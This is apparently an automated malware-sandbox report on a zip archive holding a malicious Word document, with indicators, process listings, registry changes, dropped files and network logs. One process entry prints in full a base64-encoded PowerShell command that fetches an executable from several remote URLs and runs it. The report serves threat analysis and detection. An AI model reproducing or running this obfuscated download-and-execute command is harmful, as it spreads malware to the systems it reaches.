File name: docmalevolo.zip

Full analysis: https://app.any.run/tasks/37e0964d-aee2-4932-b65b-f4721394f2c6
Verdict: Malicious activity
Analysis date: June 21, 2024, 09:16:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 39AC95C105D9D8771CEAD7626576698D
SHA1: DD4EDD9557C4697FD1202B0C3B90F65167C96D86
SHA256: CA4AE7154FA1213861596316576A15EF8D6CC2D6C7AC70C723CB6457BE4E8E42
SSDEEP: 3072:jbdks1VMpxHdLnMBWYiearauWO5piCcm0GbrHq:jlGpNd4sgyauWOPiZmlbTq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 2936)
  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 3708)
      • powershell.exe (PID: 2948)
      • rundll32.exe (PID: 268)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 2936)
    • Executed via WMI

      • powershell.exe (PID: 2948)
    • Creates file in the systems drive root

      • AcroRd32.exe (PID: 3920)
  • INFO

    • Manual execution by a user

      • rundll32.exe (PID: 3708)
      • rundll32.exe (PID: 268)
    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 3708)
      • rundll32.exe (PID: 268)
    • Reads mouse settings

      • WINWORD.EXE (PID: 2936)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2948)
    • Disables trace logs

      • powershell.exe (PID: 2948)
    • Application launched itself

      • AcroRd32.exe (PID: 2496)
      • RdrCEF.exe (PID: 3512)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2021:02:23 22:28:12
ZipCRC: 0x52427dba
ZipCompressedSize: 75009
ZipUncompressedSize: 131904
ZipFileName: 98eb9584fe82474af8df1d419c82b642
No data.
All screenshots are available in the full report
Total processes: 55
Monitored processes: 14
Malicious processes: 0
Suspicious processes: 1

Behavior graph

Process nodes in the order the report lists them ("no specs" is the report's own marker on a node):
  • start
  • winrar.exe (no specs)
  • rundll32.exe (no specs)
  • winword.exe (no specs)
  • powershell.exe
  • PhotoViewer.dll (no specs)
  • rundll32.exe (no specs)
  • acrord32.exe (no specs)
  • acrord32.exe (no specs)
  • rdrcef.exe
  • rdrcef.exe (no specs)
  • rdrcef.exe (no specs)
  • rdrcef.exe (no specs)
  • rdrcef.exe (no specs)
  • rdrcef.exe (no specs)

Process information

Columns: PID | CMD | Path | Indicators | Parent process
PID: 268
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642
Path: C:\Windows\System32\rundll32.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
PID: 596
CMD: C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path: C:\Windows\System32\dllhost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: COM Surrogate
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1524
CMD: "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=17099676560231081348 --mojo-platform-channel-handle=1232 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Path: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe RdrCEF
Exit code: 1
Version: 20.13.20064.405839
Modules (images):
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 2164
CMD: "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=16562884271090325448 --mojo-platform-channel-handle=1232 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Path: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe RdrCEF
Exit code: 1
Version: 20.13.20064.405839
Modules (images):
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 2308
CMD: "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=9126810637560622999 --mojo-platform-channel-handle=1168 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
Path: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe RdrCEF
Exit code: 1
Version: 20.13.20064.405839
Modules (images):
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 2496
CMD: "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642"
Path: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Parent process: rundll32.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: MEDIUM
Description: Adobe Acrobat Reader DC
Exit code: 1
Version: 20.13.20064.405839
Modules (images):
c:\program files\adobe\acrobat reader dc\reader\acrord32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 2936
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\98eb9584fe82474af8df1d419c82b642"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: rundll32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000
Modules (images):
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
PID: 2948
CMD: powershell -nop -e JAB3AFkAbAAzAE8AQQBxAFYAPQAnAGgAZgBKAHQAOQB3AEsAJwA7ACQAVAAwAFIAZABFAEsAegAgAD0AIAAnADgANgA4ACcAOwAkAGYAOAA4AGoAOQBjAE4APQAnAGkARABRAHAAXwBBACcAOwAkAHoAbwAzAGwAbAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABUADAAUgBkAEUASwB6ACsAJwAuAGUAeABlACcAOwAkAFAAdgBuAEwAUQBiAFcAaAA9ACcATgBVAHIANgBTAGEAJwA7ACQAcQB6AHQATABDAHMAMgBUAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBgAEIAQwBsAGAASQBFAG4AdAA7ACQAQgBjAE0AaAAzAHEAVwAxAD0AJwBoAHQAdABwADoALwAvAHMAYQBzAGEAcwBoAHUAbgAuAGMAbwBtAC8ATQBUAC0ANAAuADIANQAtAGoAYQAvAHMAagBxAEsAeQBvAHAAbwBoAHIALwBAAGgAdAB0AHAAOgAvAC8AdABoAGUAbwB0AGgAZQByAGMAZQBuAHQAdQByAHkALgBjAG8AbQAvAFMARQBnAGUAVgBDAFUAZwBhAHAALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGUAYwBuAG8AYwByAGkAbQBwAC4AYwBvAG0ALwBhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAC8ASwBrAEcARQBoAEcARQBTAC8AQABoAHQAdABwADoALwAvAHQAaQB0AHQAZwBlAG4ALgBlAHUALwBpAFgATwBXAEMATwBhAHEALwBAAGgAdAB0AHAAOgAvAC8AdABuAGMAbgBlAHQALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AeQBoADAANQAwAHIAXwB3ADYAcwBlAHIALQA5ADAAOAAzAC8AJwAuAFMAcABsAEkAdAAoACcAQAAnACkAOwAkAEEAYwBGADYAegB3AD0AJwBjAGYAWAAxAEoAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwBwAE4ARQBxADUAMAA1ACAAaQBuACAAJABCAGMATQBoADMAcQBXADEAKQB7AHQAcgB5AHsAJABxAHoAdABMAEMAcwAyAFQALgBkAE8AVwBuAEwAbwBBAEQAZgBJAEwAZQAoACQAYwBwAE4ARQBxADUAMAA1ACwAIAAkAHoAbwAzAGwAbAA3ACkAOwAkAHQARwB3AFkAVwBqAGsAMAA9ACcAegBQAFgAcgB2ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJAB6AG8AMwBsAGwANwApAC4AbABlAE4ARwB0AEgAIAAtAGcAZQAgADIANAAzADkAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwBUAGEAUgB0ACgAJAB6AG8AMwBsAGwANwApADsAJABEADIAWQAwADEARQA9ACcAcwBKAEUARgBpADQAMgBDACcAOwBiAHIAZQBhAGsAOwAkAEMANwBmADMARwAzAGoAPQAnAHQAMwB2AGgAbQBiAHMAWQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHADgAVQBXAG4AdQB6AD0AJwBWAFgAaABvAGsATQAnAA==
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3368
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\docmalevolo.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules (images):
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 3408
CMD: "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1060,17806493674224608798,10731247779713933094,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file="C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/20.13.20064 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=17292073824797742930 --renderer-client-id=6 --mojo-platform-channel-handle=1456 --allow-no-sandbox-job /prefetch:1
Path: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Parent process: RdrCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe RdrCEF
Exit code: 0
Version: 20.13.20064.405839
Modules (images):
c:\program files\adobe\acrobat reader dc\reader\acrocef\rdrcef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events: 25 759
Read events: 24 953
Write events: 484
Delete events: 322

Modification events

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\docmalevolo.zip

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3368) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120
Executable files: 1
Suspicious files: 74
Text files: 4
Unknown types: 1

Dropped files

Columns: PID | Process | Filename | Type

2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3C06.tmp.cvr |
MD5:
SHA256:

2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2444C6A0.wmf | binary
MD5: 2E99E0EA8E9F2D5CC6652AA7864B6B06
SHA256: 6F84733D49163702386C45DC6A26163EA201A4A25BB76F06FA7D68174C6FCE47

2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A441D621.wmf | binary
MD5: 3E99BE28841A445A3CD8B3B4EE299A7A
SHA256: 908594D902C48E6AE6EBCCEF6126F2B86C2A0AF733DD877B317E1AC0949A12BE

2936 | WINWORD.EXE | C:\Users\admin\Desktop\~$eb9584fe82474af8df1d419c82b642 | binary
MD5: 2DBD6DA5C7A47BED205DBE1A9A404ED8
SHA256: D33510BB8B00AE4864A358232DAD452620FA1E84B85E09D861E45DE51D92F343

2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E269ADEC.wmf | binary
MD5: 821630EA9A8868E7AF38864314066CD1
SHA256: D40E5EE33818C9C708D86C4FCDD3250DFF576372EE01F36D445EAAC3F52EA0FA

2936 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
MD5: EE1012C4DF282A64E12FCE191A7F437D
SHA256: 17CE840646B15AB42C9C573E26FA07AECB811463FDB43DD99C8BB034DFBD1E78

2936 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\98eb9584fe82474af8df1d419c82b642.LNK | binary
MD5: 11E6EAE7B9E0710F6174D5F12356EE3E
SHA256: B54F5EBAB0C19946FBA74EEFCCC534ACEC75A54E5C4E0414380FBC1AA77652E4

2936 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
MD5: 843D83FCE5E595B1A94E917EA758C865
SHA256: 17D930542B84889081363F163E3DAF3C128587B04F9220224EC485ACDC51E6F0

2936 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFEB6884E711F8CD2B.TMP | binary
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560

3512 | RdrCEF.exe | |
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 18
DNS requests: 13
Threats: 1

HTTP requests

Columns: PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation

1372 | svchost.exe | GET | 304 | 2.19.126.163:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33 | unknown | unknown
1372 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | unknown
1372 | svchost.exe | GET | 200 | 2.16.241.19:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | unknown
2948 | powershell.exe | GET | 302 | 112.78.112.46:80 | http://sasashun.com/MT-4.25-ja/sjqKyopohr/ | unknown | unknown
2948 | powershell.exe | GET | 404 | 112.78.112.46:80 | http://www.sasashun.com/MT-4.25-ja/sjqKyopohr/ | unknown | unknown
2948 | powershell.exe | GET | 404 | 68.66.209.89:80 | http://theothercentury.com/SEgeVCUgap/ | unknown | unknown
1060 | svchost.exe | GET | 304 | 92.122.101.32:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?67a3611ec3c0260d | unknown | unknown
2948 | powershell.exe | GET | 200 | 193.141.3.71:80 | http://tittgen.eu/iXOWCOaq/ | unknown | unknown

Connections

Columns: PID | Process | IP | Domain | ASN | CN | Reputation

4 | System | 192.168.100.255:137 | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
1372 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1060 | svchost.exe | 224.0.0.252:5355 | unknown
1372 | svchost.exe | 2.19.126.163:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown
1372 | svchost.exe | 2.16.241.19:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
1372 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
2948 | powershell.exe | 112.78.112.46:80 | sasashun.com | SAKURA Internet Inc. | JP | unknown
2948 | powershell.exe | 68.66.209.89:80 | theothercentury.com | A2HOSTING | US | unknown
2948 | powershell.exe | 191.96.144.227:443 | tecnocrimp.com | AS40676 | AE | unknown

DNS requests

Columns: Domain | IP | Reputation

settings-win.data.microsoft.com | 51.104.136.2 | whitelisted
ctldl.windowsupdate.com | 2.19.126.163, 2.19.126.137, 92.122.101.32, 92.122.101.48 | whitelisted
crl.microsoft.com | 2.16.241.19, 2.16.241.12 | whitelisted
www.microsoft.com | 95.101.149.131 | whitelisted
sasashun.com | 112.78.112.46 | unknown
www.sasashun.com | 112.78.112.46 | unknown
theothercentury.com | 68.66.209.89 | unknown
tecnocrimp.com | 191.96.144.227 | unknown
geo2.adobe.com | 104.124.108.165 | whitelisted
tittgen.eu | 193.141.3.71 | malicious

Threats

Columns: PID | Process | Class | Message

2948 | powershell.exe | Misc activity | ET INFO Observed ZeroSSL SSL/TLS Certificate
No debug info